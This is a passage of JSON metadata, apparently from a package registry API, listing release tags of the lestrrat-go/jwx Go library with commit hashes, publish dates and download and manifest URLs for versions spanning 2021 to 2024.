rat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:3